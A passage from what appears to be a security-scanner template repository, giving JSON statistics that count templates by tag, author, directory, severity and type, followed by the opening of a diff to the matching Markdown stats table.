"name":"dell","count":10},{"name":"xxe","count":9},{"name":"ftp","count":9},{"name":"magento","count":9},{"name":"airflow","count":8},{"name":"ruijie","count":8},{"name":"gitlab","count":8},{"name":"rails","count":8},{"name":"scada","count":8},{"name":"nginx","count":8},{"name":"intrusive","count":8},{"name":"cnvd","count":8},{"name":"wp-theme","count":7},{"name":"kubernetes","count":7},{"name":"backup","count":7},{"name":"cves","count":7},{"name":"google","count":7},{"name":"confluence","count":7},{"name":"microsoft","count":7},{"name":"cve2009","count":7},{"name":"vmware","count":7},{"name":"cms","count":7},{"name":"ibm","count":7},{"name":"files","count":7},{"name":"coldfusion","count":7},{"name":"netgear","count":7},{"name":"solr","count":6},{"name":"django","count":6},{"name":"rconfig","count":6},{"name":"docker","count":6},{"name":"cve2008","count":6},{"name":"jetty","count":6},{"name":"api","count":6},{"name":"laravel","count":6},{"name":"citrix","count":6},{"name":"headless","count":5},{"name":"fileupload","count":5},{"name":"dedecms","count":5},{"name":"deserialization","count":5},{"name":"circarlife","count":5},{"name":"drupal","count":5},{"name":"jolokia","count":5},{"name":"tomcat","count":5},{"name":"java","count":5},{"name":"nodejs","count":5},{"name":"printer","count":5},{"name":"windows","count":5},{"name":"phpmyadmin","count":5},{"name":"ssti","count":5},{"name":"lucee","count":5},{"name":"iis","count":5},{"name":"samsung","count":4},{"name":"moodle","count":4},{"name":"hp","count":4},{"name":"symfony","count":4},{"name":"zimbra","count":4},{"name":"thinkcmf","count":4},{"name":"asp","count":4},{"name":"magmi","count":4},{"name":"webserver","count":4},{"name":"exchange","count":4},{"name":"grafana","count":4},{"name":"artifactory","count":4},{"name":"solarwinds","count":4},{"name":"thinkphp","count":4},{"name":"vpn","count":4},{"name":"resin","count":4},{"name":"strapi","count":4},{"name":"elastic","count":4},{"name":"symantec","count":4},{"name":"proxy","count":4},{"name":"crlf","count":4},{"name":"firmware","count":4},{"name":"hongdian","count":4},{"name":"traversal","count":4},{"name":"glpi","count":4},{"name":"wso2","count":4},{"name":"buffalo","count":4},{"name":"camera","count":3},{"name":"caucho","count":3},{"name":"zhiyuan","count":3},{"name":"tikiwiki","count":3},{"name":"jellyfin","count":3},{"name":"r-seenet","count":3},{"name":"npm","count":3},{"name":"openssh","count":3},{"name":"smtp","count":3},{"name":"zabbix","count":3},{"name":"microstrategy","count":3},{"name":"lfr","count":3},{"name":"druid","count":3},{"name":"backups","count":3},{"name":"terramaster","count":3},{"name":"nosqli","count":3},{"name":"slack","count":3},{"name":"bypass","count":3},{"name":"nacos","count":3},{"name":"prometheus","count":3},{"name":"ebs","count":3},{"name":"amazon","count":3},{"name":"nexus","count":3},{"name":"cacti","count":3},{"name":"targa","count":3},{"name":"kibana","count":3},{"name":"log","count":3},{"name":"bigip","count":3},{"name":"itop","count":3},{"name":"fanruan","count":3},{"name":"bitrix","count":3},{"name":"oa","count":3},{"name":"openam","count":3},{"name":"git","count":3},{"name":"springcloud","count":3},{"name":"firebase","count":3},{"name":"fpd","count":3},{"name":"mongodb","count":3},{"name":"hoteldruid","count":3},{"name":"kevinlab","count":3},{"name":"opensis","count":3},{"name":"ofbiz","count":3},{"name":"injection","count":3},{"name":"mail","count":3},{"name":"httpd","count":3},{"name":"telerik","count":3},{"name":"kafka","count":3},{"name":"vbulletin","count":3},{"name":"ssh","count":3},{"name":"linkerd","count":3},{"name":"hashicorp","count":2},{"name":"harbor","count":2},{"name":"cve2005","count":2},{"name":"chamilo","count":2},{"name":"avantfax","count":2},{"name":"akkadian","count":2},{"name":"shellshock","count":2},{"name":"waf","count":2},{"name":"icewarp","count":2},{"name":"fortios","count":2},{"name":"service","count":2},{"name":"ec2","count":2},{"name":"azure","count":2},{"name":"axis2","count":2},{"name":"globalprotect","count":2},{"name":"netis","count":2},{"name":"nextcloud","count":2},{"name":"couchdb","count":2},{"name":"spark","count":2},{"name":"mcafee","count":2},{"name":"hjtcloud","count":2},{"name":"emerge","count":2},{"name":"wordfence","count":2},{"name":"node","count":2},{"name":"qcubed","count":2},{"name":"yapi","count":2},{"name":"rstudio","count":2},{"name":"huawei","count":2},{"name":"nextjs","count":2},{"name":"totemomail","count":2},{"name":"dolibarr","count":2},{"name":"jboss","count":2},{"name":"maian","count":2},{"name":"bruteforce","count":2},{"name":"hasura","count":2},{"name":"openfire","count":2},{"name":"sonarqube","count":2},{"name":"cache","count":2},{"name":"saltstack","count":2},{"name":"showdoc","count":2},{"name":"cve2007","count":2},{"name":"netsweeper","count":2},{"name":"glassfish","count":2},{"name":"favicon","count":2},{"name":"akamai","count":2},{"name":"nagios","count":2},{"name":"paloalto","count":2},{"name":"idrac","count":2},{"name":"getsimple","count":2},{"name":"ilo","count":2},{"name":"leak","count":2},{"name":"hostheader-injection","count":2},{"name":"mida","count":2},{"name":"dos","count":2},{"name":"igs","count":2},{"name":"sharepoint","count":2},{"name":"kentico","count":2},{"name":"status","count":2},{"name":"adminer","count":2},{"name":"github","count":2},{"name":"plesk","count":2},{"name":"webcam","count":2},{"name":"pega","count":2},{"name":"xxljob","count":2},{"name":"frp","count":2},{"name":"axis","count":2},{"name":"db","count":2},{"name":"horde","count":2},{"name":"geowebserver","count":2},{"name":"phpcollab","count":2},{"name":"jeedom","count":2},{"name":"ecology","count":2},{"name":"storage","count":2},{"name":"prestashop","count":2},{"name":"kong","count":2},{"name":"ucmdb","count":2},{"name":"hpe","count":2},{"name":"natshell","count":2},{"name":"smb","count":2},{"name":"prtg","count":2},{"name":"chiyu","count":2},{"name":"liferay","count":2},{"name":"odoo","count":2},{"name":"keycloak","count":2},{"name":"flir","count":2},{"name":"rockmongo","count":2},{"name":"activemq","count":2},{"name":"minio","count":2},{"name":"splunk","count":2},{"name":"sonicwall","count":2},{"name":"grav","count":2},{"name":"vrealize","count":2},{"name":"oauth","count":2},{"name":"aruba","count":2},{"name":"seeyon","count":2},{"name":"bucket","count":2},{"name":"jsf","count":2},{"name":"voipmonitor","count":2},{"name":"middleware","count":2},{"name":"rockethchat","count":2},{"name":"yii","count":2},{"name":"guacamole","count":2},{"name":"backdoor","count":2},{"name":"trixbox","count":2},{"name":"clockwork","count":1},{"name":"shopizer","count":1},{"name":"graylog","count":1},{"name":"api-manager","count":1},{"name":"turbocrm","count":1},{"name":"linksys","count":1},{"name":"socomec","count":1},{"name":"embedthis","count":1},{"name":"nsasg","count":1},{"name":"plugin","count":1},{"name":"kubeflow","count":1},{"name":"hadoop","count":1},{"name":"metabase","count":1},{"name":"basic-auth","count":1},{"name":"manageengine","count":1},{"name":"razor","count":1},{"name":"ilo4","count":1},{"name":"javafaces","count":1},{"name":"exposures","count":1},{"name":"netdata","count":1},{"name":"realteo","count":1},{"name":"wiki","count":1},{"name":"tensorboard","count":1},{"name":"blind","count":1},{"name":"cockpit","count":1},{"name":"nette","count":1},{"name":"node-red-dashboard","count":1},{"name":"blue-ocean","count":1},{"name":"wuzhicms","count":1},{"name":"seacms","count":1},{"name":"tidb","count":1},{"name":"apos","count":1},{"name":"kerbynet","count":1},{"name":"octobercms","count":1},{"name":"addpac","count":1},{"name":"stem","count":1},{"name":"ioncube","count":1},{"name":"chyrp","count":1},{"name":"rmi","count":1},{"name":"sarg","count":1},{"name":"mysql","count":1},{"name":"shopware","count":1},{"name":"gunicorn","count":1},{"name":"powercreator","count":1},{"name":"ognl","count":1},{"name":"servicenow","count":1},{"name":"jnoj","count":1},{"name":"kindeditor","count":1},{"name":"wmt","count":1},{"name":"mantisbt","count":1},{"name":"bash","count":1},{"name":"linux","count":1},{"name":"omi","count":1},{"name":"tieline","count":1},{"name":"nimble","count":1},{"name":"cocoon","count":1},{"name":"openrestry","count":1},{"name":"varnish","count":1},{"name":"h3c-imc","count":1},{"name":"cofax","count":1},{"name":"synnefo","count":1},{"name":"acme","count":1},{"name":"landray","count":1},{"name":"enum","count":1},{"name":"apiman","count":1},{"name":"cse","count":1},{"name":"sangfor","count":1},{"name":"opensns","count":1},{"name":" default-login","count":1},{"name":"miscrsoft","count":1},{"name":"enumeration","count":1},{"name":"nc2","count":1},{"name":"blackboard","count":1},{"name":"csrf","count":1},{"name":"zzzcms","count":1},{"name":"plone","count":1},{"name":"gespage","count":1},{"name":"announcekit","count":1},{"name":"fortilogger","count":1},{"name":"htmli","count":1},{"name":"jitsi","count":1},{"name":"viewlinc","count":1},{"name":"asus","count":1},{"name":"influxdb","count":1},{"name":"webmin","count":1},{"name":"tectuus","count":1},{"name":"redwood","count":1},{"name":"zend","count":1},{"name":"redhat","count":1},{"name":"rmc","count":1},{"name":"solman","count":1},{"name":"xff","count":1},{"name":"gogs","count":1},{"name":"terraform","count":1},{"name":"circontrol","count":1},{"name":"cobub","count":1},{"name":"websphere","count":1},{"name":"cgi","count":1},{"name":"bullwark","count":1},{"name":"aura","count":1},{"name":"smartblog","count":1},{"name":"saltapi","count":1},{"name":"expressjs","count":1},{"name":"csod","count":1},{"name":"cloudflare","count":1},{"name":"lancom","count":1},{"name":"keenetic","count":1},{"name":"pagespeed","count":1},{"name":"aspnuke","count":1},{"name":"s3","count":1},{"name":"scimono","count":1},{"name":"graphite","count":1},{"name":"openvpn","count":1},{"name":"woocomernce","count":1},{"name":"spip","count":1},{"name":"natemail","count":1},{"name":"elfinder","count":1},{"name":"sprintful","count":1},{"name":"appweb","count":1},{"name":"metinfo","count":1},{"name":"zmanda","count":1},{"name":"servicedesk","count":1},{"name":"emc","count":1},{"name":"tongda","count":1},{"name":"bitly","count":1},{"name":"netgenie","count":1},{"name":"szhe","count":1},{"name":"mongo","count":1},{"name":"ueditor","count":1},{"name":"yachtcontrol","count":1},{"name":"faraday","count":1},{"name":"redmine","count":1},{"name":"jsp","count":1},{"name":"phpwiki","count":1},{"name":"gstorage","count":1},{"name":"sceditor","count":1},{"name":"whm","count":1},{"name":"dotnet","count":1},{"name":"netmask","count":1},{"name":"traefik","count":1},{"name":"opentsdb","count":1},{"name":"webadmin","count":1},{"name":"tapestry","count":1},{"name":"episerver","count":1},{"name":"jfrog","count":1},{"name":"monitorix","count":1},{"name":"pmb","count":1},{"name":"ghost","count":1},{"name":"2014","count":1},{"name":"processmaker","count":1},{"name":"ecom","count":1},{"name":"burp","count":1},{"name":"ssl","count":1},{"name":"oscommerce","count":1},{"name":"logontracer","count":1},{"name":"magicflow","count":1},{"name":"empirecms","count":1},{"name":"azkaban","count":1},{"name":"drone","count":1},{"name":"oneblog","count":1},{"name":"shiro","count":1},{"name":"subrion","count":1},{"name":"simplecrm","count":1},{"name":"swagger","count":1},{"name":"adb","count":1},{"name":"javamelody","count":1},{"name":"werkzeug","count":1},{"name":"clockwatch","count":1},{"name":"tamronos","count":1},{"name":"exacqvision","count":1},{"name":"heroku","count":1},{"name":"octoprint","count":1},{"name":"st","count":1},{"name":"linkedin","count":1},{"name":"redcap","count":1},{"name":"pyramid","count":1},{"name":"alibaba","count":1},{"name":"pcoip","count":1},{"name":"dvwa","count":1},{"name":"xunchi","count":1},{"name":"rdp","count":1},{"name":"zte","count":1},{"name":"xml","count":1},{"name":"selea","count":1},{"name":"myucms","count":1},{"name":"postgres","count":1},{"name":"moinmoin","count":1},{"name":"achecker","count":1},{"name":"smartsense","count":1},{"name":"pacsone","count":1},{"name":"fortigate","count":1},{"name":"zeroshell","count":1},{"name":"tracer","count":1},{"name":"sco","count":1},{"name":"clink-office","count":1},{"name":"bazarr","count":1},{"name":"pippoint","count":1},{"name":"lotus","count":1},{"name":"ruby","count":1},{"name":"wavemaker","count":1},{"name":"nuuo","count":1},{"name":"sophos","count":1},{"name":"webftp","count":1},{"name":"ntopng","count":1},{"name":"hiawatha","count":1},{"name":"graphql","count":1},{"name":"cors","count":1},{"name":"avtech","count":1},{"name":"alerta","count":1},{"name":"soar","count":1},{"name":"visualtools","count":1},{"name":"gotmls","count":1},{"name":"ems","count":1},{"name":"clave","count":1},{"name":"domxss","count":1},{"name":"gitea","count":1},{"name":"tcexam","count":1},{"name":"listserv","count":1},{"name":"sitecore","count":1},{"name":"vnc","count":1},{"name":"esmtp","count":1},{"name":"openerp","count":1},{"name":"krweb","count":1},{"name":"hiboss","count":1},{"name":"solarlog","count":1},{"name":"owa","count":1},{"name":"mirai","count":1},{"name":"weiphp","count":1},{"name":"oidc","count":1},{"name":"labtech","count":1},{"name":"wildfly","count":1},{"name":"moin","count":1},{"name":"maxsite","count":1},{"name":"lanproxy","count":1},{"name":"triconsole","count":1},{"name":"jenzabar","count":1},{"name":"trane","count":1},{"name":"phpfastcache","count":1},{"name":"mpsec","count":1},{"name":"yealink","count":1},{"name":"maccmsv10","count":1},{"name":"cves2016","count":1},{"name":"eyelock","count":1},{"name":"mdb","count":1},{"name":"dvr","count":1},{"name":"k8s","count":1},{"name":"myvuehelp","count":1},{"name":"biometrics","count":1},{"name":"jeewms","count":1},{"name":"livezilla","count":1},{"name":"goahead","count":1},{"name":"mobileiron","count":1},{"name":"calendarix","count":1},{"name":"qvisdvr","count":1},{"name":"svnserve","count":1},{"name":"smi","count":1},{"name":"zyxel","count":1},{"name":"sar2html","count":1},{"name":"plc","count":1},{"name":"sidekiq","count":1},{"name":"qsan","count":1},{"name":"ruckus","count":1},{"name":"discord","count":1},{"name":"starttls","count":1},{"name":"haproxy","count":1},{"name":"accela","count":1},{"name":"sentry","count":1},{"name":"fedora","count":1},{"name":"centreon","count":1},{"name":"interlib","count":1},{"name":"huijietong","count":1},{"name":"k8","count":1},{"name":"acexy","count":1},{"name":"majordomo2","count":1},{"name":"dompdf","count":1},{"name":"cherokee","count":1},{"name":"auth","count":1},{"name":"mantis","count":1},{"name":"exponentcms","count":1},{"name":"eyou","count":1},{"name":"fortigates","count":1},{"name":"karel","count":1},{"name":"bookstack","count":1},{"name":"nps","count":1},{"name":"ssltls","count":1},{"name":"codemeter","count":1},{"name":"sage","count":1},{"name":"rfi","count":1},{"name":"spidercontrol","count":1},{"name":"sqlite","count":1},{"name":"cve2006","count":1},{"name":"cyberoam","count":1},{"name":"pgadmin","count":1},{"name":"fastcgi","count":1},{"name":"openx","count":1},{"name":"arl","count":1},{"name":"rsyncd","count":1},{"name":"emby","count":1},{"name":"etouch","count":1},{"name":"optiLink","count":1},{"name":"couchbase","count":1},{"name":"wing-ftp","count":1},{"name":"svn","count":1},{"name":"frontpage","count":1},{"name":"eg","count":1},{"name":"rujjie","count":1},{"name":"phpfusion","count":1},{"name":"landrayoa","count":1},{"name":"tika","count":1},{"name":"vsphere","count":1},{"name":"alertmanager","count":1},{"name":"ricoh","count":1},{"name":"geddy","count":1},{"name":"lighttpd","count":1},{"name":"fastapi","count":1},{"name":"codeigniter","count":1},{"name":"argussurveillance","count":1},{"name":"tjws","count":1},{"name":"fortiweb","count":1},{"name":"expose","count":1},{"name":"payara","count":1},{"name":"jmx","count":1},{"name":"camunda","count":1},{"name":"twitter-server","count":1},{"name":"memcached","count":1},{"name":"jenkin","count":1},{"name":"gloo","count":1},{"name":"tpshop","count":1},{"name":"kyan","count":1},{"name":"concrete","count":1},{"name":"circontrorl","count":1},{"name":"ns","count":1},{"name":"wavlink","count":1},{"name":"rabbitmq","count":1},{"name":"plastic","count":1},{"name":"dbeaver","count":1},{"name":"cloudinary","count":1},{"name":"rubedo","count":1},{"name":"nedi","count":1},{"name":"opm","count":1},{"name":"panos","count":1},{"name":"shoppable","count":1},{"name":"phalcon","count":1},{"name":"setup","count":1},{"name":"meraki","count":1},{"name":"webui","count":1},{"name":"skywalking","count":1},{"name":"redis","count":1},{"name":"office365","count":1},{"name":"erp-nc","count":1},{"name":"spectracom","count":1},{"name":"zookeeper","count":1},{"name":"extractor","count":1},{"name":"tor","count":1},{"name":"email","count":1},{"name":"xmlchart","count":1},{"name":"fortinet","count":1},{"name":"phpinfo","count":1},{"name":"dotnetnuke","count":1},{"name":"lotuscms","count":1},{"name":"wooyun","count":1},{"name":"craftcms","count":1},{"name":"wondercms","count":1},{"name":"tensorflow","count":1},{"name":"opensmtpd","count":1},{"name":"feifeicms","count":1},{"name":"74cms","count":1},{"name":"parentlink","count":1},{"name":"kafdrop","count":1},{"name":"mediumish","count":1},{"name":"webmodule-ee","count":1},{"name":"jaspersoft","count":1},{"name":"tileserver","count":1},{"name":"zm","count":1},{"name":"mongoshake","count":1},{"name":"b2evolution","count":1},{"name":"minimouse","count":1},{"name":"websvn","count":1},{"name":"discourse","count":1},{"name":"portainer","count":1},{"name":"sureline","count":1},{"name":"diris","count":1},{"name":"artica","count":1},{"name":"owasp","count":1},{"name":"dotclear","count":1},{"name":"acontent","count":1},{"name":"resourcespace","count":1},{"name":"bolt","count":1},{"name":"salesforce","count":1},{"name":"beanshell","count":1},{"name":"scs","count":1},{"name":"lg-nas","count":1},{"name":"perl","count":1},{"name":"anchorcms","count":1},{"name":"javascript","count":1},{"name":"actuator","count":1},{"name":"pihole","count":1},{"name":"iptime","count":1},{"name":"vscode","count":1},{"name":"primetek","count":1},{"name":"shopxo","count":1},{"name":"vsftpd","count":1},{"name":"sourcebans","count":1},{"name":"daybyday","count":1},{"name":"monitorr","count":1},{"name":"elascticsearch","count":1},{"name":"timesheet","count":1},{"name":"vidyo","count":1},{"name":"rhymix","count":1},{"name":"expn","count":1},{"name":"doh","count":1},{"name":"centos","count":1},{"name":"upnp","count":1},{"name":"spring","count":1},{"name":"ewebs","count":1},{"name":"darkstat","count":1},{"name":"mautic","count":1},{"name":"iceflow","count":1},{"name":"xiuno","count":1},{"name":"commax","count":1},{"name":"ulterius","count":1},{"name":"shoretel","count":1},{"name":"wazuh","count":1},{"name":"fuelcms","count":1},{"name":"mariadb","count":1},{"name":"nweb2fax","count":1},{"name":"avalanche","count":1},{"name":"fiori","count":1},{"name":"upload","count":1},{"name":"opencast","count":1},{"name":"lansweeper","count":1},{"name":"ganglia","count":1},{"name":"hortonworks","count":1},{"name":"bedita","count":1},{"name":"openstack","count":1},{"name":"mara","count":1},{"name":"trilithic","count":1},{"name":"visionhub","count":1},{"name":"mailchimp","count":1},{"name":"checkpoint","count":1},{"name":"dnssec","count":1},{"name":"zenario","count":1},{"name":"gateone","count":1},{"name":"mrtg","count":1},{"name":"panabit","count":1},{"name":"lutron","count":1},{"name":"postmessage","count":1},{"name":"jquery","count":1},{"name":"froxlor","count":1},{"name":"totaljs","count":1},{"name":"zms","count":1},{"name":"uwsgi","count":1},{"name":"commscope","count":1},{"name":"wamp","count":1},{"name":"sgp","count":1},{"name":"floc","count":1},{"name":"default","count":1},{"name":"clickhouse","count":1},{"name":"wifisky","count":1},{"name":"idemia","count":1},{"name":"robomongo","count":1},{"name":"gitlist","count":1},{"name":"thinkadmin","count":1},{"name":"openemr","count":1},{"name":"gridx","count":1},{"name":"cerebro","count":1},{"name":"zcms","count":1},{"name":"grails","count":1},{"name":"phpunit","count":1},{"name":"chinaunicom","count":1},{"name":"flink","count":1},{"name":"crm","count":1},{"name":"nifi","count":1},{"name":"flash","count":1},{"name":"ambari","count":1},{"name":"duomicms","count":1},{"name":"dom","count":1},{"name":"netrc","count":1},{"name":"proftpd","count":1},{"name":"nomad","count":1},{"name":"comodo","count":1},{"name":"tenda","count":1},{"name":"zarafa","count":1},{"name":"chevereto","count":1},{"name":"spf","count":1},{"name":"clusterengine","count":1},{"name":"finereport","count":1},{"name":"bigbluebutton","count":1},{"name":"nexusdb","count":1},{"name":"glances","count":1},{"name":"pulsesecure","count":1},{"name":"springframework","count":1},{"name":"eprints","count":1},{"name":"klog","count":1},{"name":"nordex","count":1},{"name":"qdpm","count":1},{"name":"xdcms","count":1},{"name":"viewpoint","count":1},{"name":"nuxeo","count":1},{"name":"gsoap","count":1},{"name":"geutebruck","count":1},{"name":"xvr","count":1},{"name":"timeclock","count":1}],"authors":[{"name":"pikpikcu","count":267},{"name":"dhiyaneshdk","count":253},{"name":"daffainfo","count":206},{"name":"pdteam","count":195},{"name":"geeknik","count":151},{"name":"dwisiswant0","count":132},{"name":"gy741","count":72},{"name":"madrobot","count":62},{"name":"princechaddha","count":61},{"name":"pussycat0x","count":58},{"name":"gaurang","count":42},{"name":"0x_akoko","count":33},{"name":"ice3man","count":26},{"name":"philippedelteil","count":25},{"name":"organiccrap","count":24},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"pr3r00t","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":10},{"name":"wdahlenb","count":10},{"name":"nadino","count":9},{"name":"melbadry9","count":9},{"name":"hackergautam","count":9},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"iamthefrogy","count":8},{"name":"dogasantos","count":7},{"name":"oppsec","count":7},{"name":"dr_set","count":7},{"name":"0x240x23elu","count":7},{"name":"harshbothra_","count":7},{"name":"techryptic (@tech)","count":7},{"name":"kophjager007","count":7},{"name":"emadshanab","count":7},{"name":"randomstr1ng","count":7},{"name":"caspergn","count":6},{"name":"puzzlepeaches","count":6},{"name":"logicalhunter","count":6},{"name":"__fazal","count":6},{"name":"meme-lord","count":6},{"name":"ganofins","count":5},{"name":"joanbono","count":5},{"name":"rootxharsh","count":5},{"name":"iamnoooob","count":5},{"name":"panch0r3d","count":5},{"name":"pentest_swissky","count":5},{"name":"elsfa7110","count":5},{"name":"yanyun","count":5},{"name":"lu4nx","count":4},{"name":"xelkomy","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"github.com/its0x08","count":4},{"name":"jarijaas","count":3},{"name":"binaryfigments","count":3},{"name":"johnk3r","count":3},{"name":"0w4ys","count":3},{"name":"incogbyte","count":3},{"name":"skeltavik","count":3},{"name":"dudez","count":3},{"name":"vsh00t","count":3},{"name":"emenalf","count":3},{"name":"idealphase","count":3},{"name":"shine","count":3},{"name":"mavericknerd","count":3},{"name":"shifacyclewala","count":3},{"name":"f1tz","count":3},{"name":"tess","count":3},{"name":"_generic_human_","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"impramodsargar","count":3},{"name":"z3bd","count":3},{"name":"thomas_from_offensity","count":3},{"name":"fyoorer","count":3},{"name":"random-robbie","count":2},{"name":"0xelkomy","count":2},{"name":"randomrobbie","count":2},{"name":"foulenzer","count":2},{"name":"mohammedsaneem","count":2},{"name":"pxmme1337","count":2},{"name":"convisoappsec","count":2},{"name":"bsysop","count":2},{"name":"unstabl3","count":2},{"name":"hahwul","count":2},{"name":"x1m_martijn","count":2},{"name":"joeldeleep","count":2},{"name":"gal nagli","count":2},{"name":"arcc","count":2},{"name":"koti2","count":2},{"name":"fabaff","count":2},{"name":"bp0lr","count":2},{"name":"sushantkamble","count":2},{"name":"amsda","count":2},{"name":"afaq","count":2},{"name":"davidmckennirey","count":2},{"name":"gevakun","count":2},{"name":"whoever","count":2},{"name":"w4cky_","count":2},{"name":"ehsahil","count":2},{"name":"parth","count":2},{"name":"swissky","count":2},{"name":"johnjhacking","count":2},{"name":"bing0o","count":2},{"name":"0xcrypto","count":2},{"name":"moritz nentwig","count":2},{"name":"0xprial","count":2},{"name":"udit_thakkur","count":2},{"name":"zomsop82","count":2},{"name":"lotusdll","count":2},{"name":"huowuzhao","count":2},{"name":"nkxxkn","count":2},{"name":"r3naissance","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"socketz","count":2},{"name":"vavkamil","count":2},{"name":"alifathi-h1","count":2},{"name":"manas_harsh","count":2},{"name":"ree4pwn","count":2},{"name":"0xrudra","count":2},{"name":"g4l1t0","count":2},{"name":"dheerajmadhukar","count":2},{"name":"kiblyn11","count":2},{"name":"cocxanh","count":2},{"name":"hetroublemakr","count":2},{"name":"0xsapra","count":2},{"name":"bolli95","count":1},{"name":"yavolo","count":1},{"name":"remonsec","count":1},{"name":"knassar702","count":1},{"name":"cookiehanhoan","count":1},{"name":"undefl0w","count":1},{"name":"philippdelteil","count":1},{"name":"_c0wb0y_","count":1},{"name":"andysvints","count":1},{"name":"x6263","count":1},{"name":"b0yd","count":1},{"name":"ooooooo_q","count":1},{"name":"makyotox","count":1},{"name":"ahmed sherif","count":1},{"name":"ohlinge","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"kre80r","count":1},{"name":"bad5ect0r","count":1},{"name":"0ut0fb4nd","count":1},{"name":"adrianmf","count":1},{"name":"sshell","count":1},{"name":"borna nematzadeh","count":1},{"name":"noamrathaus","count":1},{"name":"whynotke","count":1},{"name":"fmunozs","count":1},{"name":"geraldino2","count":1},{"name":"yashgoti","count":1},{"name":"mhdsamx","count":1},{"name":"sickwell","count":1},{"name":"mesaglio","count":1},{"name":"dawid-czarnecki","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"luci","count":1},{"name":"jeya seelan","count":1},{"name":"izn0u","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"tirtha_mandal","count":1},{"name":"elder tao","count":1},{"name":"shelld3v","count":1},{"name":"regala_","count":1},{"name":"pratik khalane","count":1},{"name":"shreyapohekar","count":1},{"name":"s1r1u5_","count":1},{"name":"alex","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"rotemreiss","count":1},{"name":"nytr0gen","count":1},{"name":"0xrod","count":1},{"name":"juicypotato1","count":1},{"name":"xstp","count":1},{"name":"taielab","count":1},{"name":"0xteles","count":1},{"name":"52971","count":1},{"name":"hakluke","count":1},{"name":"fopina","count":1},{"name":"rodnt","count":1},{"name":"jteles","count":1},{"name":"zandros0","count":1},{"name":"naglinagli","count":1},{"name":"0xtavian","count":1},{"name":"blckraven","count":1},{"name":"_darrenmartyn","count":1},{"name":"infosecsanyam","count":1},{"name":"me9187","count":1},{"name":"patralos","count":1},{"name":"ahmetpergamum","count":1},{"name":"vzamanillo","count":1},{"name":"th3.d1p4k","count":1},{"name":"notsoevilweasel","count":1},{"name":"un-fmunozs","count":1},{"name":"thezakman","count":1},{"name":"smaranchand","count":1},{"name":"willd96","count":1},{"name":"co0nan","count":1},{"name":"kurohost","count":1},{"name":"ilovebinbash","count":1},{"name":"aresx","count":1},{"name":"toufik airane","count":1},{"name":"j33n1k4","count":1},{"name":"bernardofsr","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"affix","count":1},{"name":"hanlaomo","count":1},{"name":"tim_koopmans","count":1},{"name":"sicksec","count":1},{"name":"udyz","count":1},{"name":"pudsec","count":1},{"name":"alperenkesk","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"akshansh","count":1},{"name":"b4uh0lz","count":1},{"name":"becivells","count":1},{"name":"ringo","count":1},{"name":"divya_mudgal","count":1},{"name":"thevillagehacker","count":1},{"name":"its0x08","count":1},{"name":"b0rn2r00t","count":1},{"name":"mubassirpatel","count":1},{"name":"defr0ggy","count":1},{"name":"push4d","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"deena","count":1},{"name":"rojanrijal","count":1},{"name":"raesene","count":1},{"name":"elmahdi","count":1},{"name":"mass0ma","count":1},{"name":"ldionmarcil","count":1},{"name":"pdp","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"_harleo","count":1},{"name":"ajaysenr","count":1},{"name":"micha3lb3n","count":1},{"name":"exploitation","count":1},{"name":"kabirsuda","count":1},{"name":"omarkurt","count":1},{"name":"streetofhackerr007","count":1},{"name":"c3l3si4n","count":1},{"name":"absshax","count":1},{"name":"bjhulst","count":1},{"name":"@dwisiswant0","count":1},{"name":"luskabol","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"sec_hawk","count":1},{"name":"shifacyclewla","count":1},{"name":"berkdusunur","count":1},{"name":"mah3sec_","count":1},{"name":"soyelmago","count":1},{"name":"zhenwarx","count":1},{"name":"alph4byt3","count":1},{"name":"chron0x","count":1},{"name":"flag007","count":1},{"name":"akash.c","count":1},{"name":"0h1in9e","count":1},{"name":"intx0x80","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"manuelbua","count":1},{"name":"d0rkerdevil","count":1},{"name":"yashanand155","count":1},{"name":"kareemse1im","count":1},{"name":"furkansenan","count":1},{"name":"wabafet","count":1},{"name":"ipanda","count":1},{"name":"iampritam","count":1},{"name":"petruknisme","count":1},{"name":"revblock","count":1},{"name":"gboddin","count":1},{"name":"schniggie","count":1},{"name":"apt-mirror","count":1},{"name":"sy3omda","count":1},{"name":"sullo","count":1},{"name":"andirrahmani1","count":1},{"name":"daviey","count":1},{"name":"qlkwej","count":1},{"name":"retr0","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"evolutionsec","count":1}],"directory":[{"name":"cves","count":715},{"name":"vulnerabilities","count":291},{"name":"exposed-panels","count":248},{"name":"exposures","count":187},{"name":"technologies","count":182},{"name":"misconfiguration","count":132},{"name":"takeovers","count":63},{"name":"default-logins","count":56},{"name":"file","count":46},{"name":"workflows","count":36},{"name":"network","count":32},{"name":"miscellaneous","count":24},{"name":"iot","count":23},{"name":"dns","count":12},{"name":"fuzzing","count":9},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":630},{"name":"high","count":546},{"name":"medium","count":441},{"name":"critical","count":269},{"name":"low","count":148}],"types":[{"name":"http","count":1930},{"name":"file","count":46},{"name":"network","count":41},{"name":"dns","count":12}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 4f95b9d14a..b752fd5e41 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,799 +1,807 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 690 | dhiyaneshdk | 252 | cves | 